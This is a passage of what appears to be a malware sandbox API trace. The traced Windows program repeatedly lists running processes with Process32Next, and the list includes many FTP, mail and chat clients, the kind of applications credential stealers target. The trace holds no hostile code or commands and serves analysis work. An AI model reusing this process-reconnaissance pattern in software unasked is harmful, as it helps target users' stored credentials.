lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0156.244] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0156.247] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0156.249] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0156.252] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0156.254] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0156.258] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0156.260] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0156.263] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0156.265] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0156.267] CloseHandle (hObject=0x1c7c) returned 1 [0156.268] Sleep (dwMilliseconds=0x64) [0156.383] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f00 [0156.399] Process32First (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.405] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0156.407] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0156.409] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0156.411] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0156.414] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0156.416] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0156.418] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0156.420] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0156.492] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.501] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.503] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0156.505] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.507] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.510] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.512] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.514] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.516] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.519] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.521] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0156.524] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0156.526] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0156.529] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0156.531] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.592] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0156.595] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0156.597] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0156.600] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0156.602] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0156.606] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0156.608] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.610] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0156.612] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0156.614] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0156.615] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0156.617] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.619] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0156.621] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0156.623] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0156.625] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0156.671] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0156.673] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0156.676] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0156.678] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0156.680] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0156.682] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0156.683] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0156.686] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0156.687] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0156.689] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0156.691] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0156.693] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0156.694] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0156.696] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0156.698] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0156.700] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0156.702] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0156.704] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0156.712] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0156.714] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0156.717] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0156.719] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0156.721] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0156.724] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0156.726] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0156.729] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0156.731] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0156.733] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0156.735] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0156.737] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0156.739] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0156.741] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0156.744] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0156.748] Process32Next (in: hSnapshot=0x1f00, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0156.750] Process32Next (in: 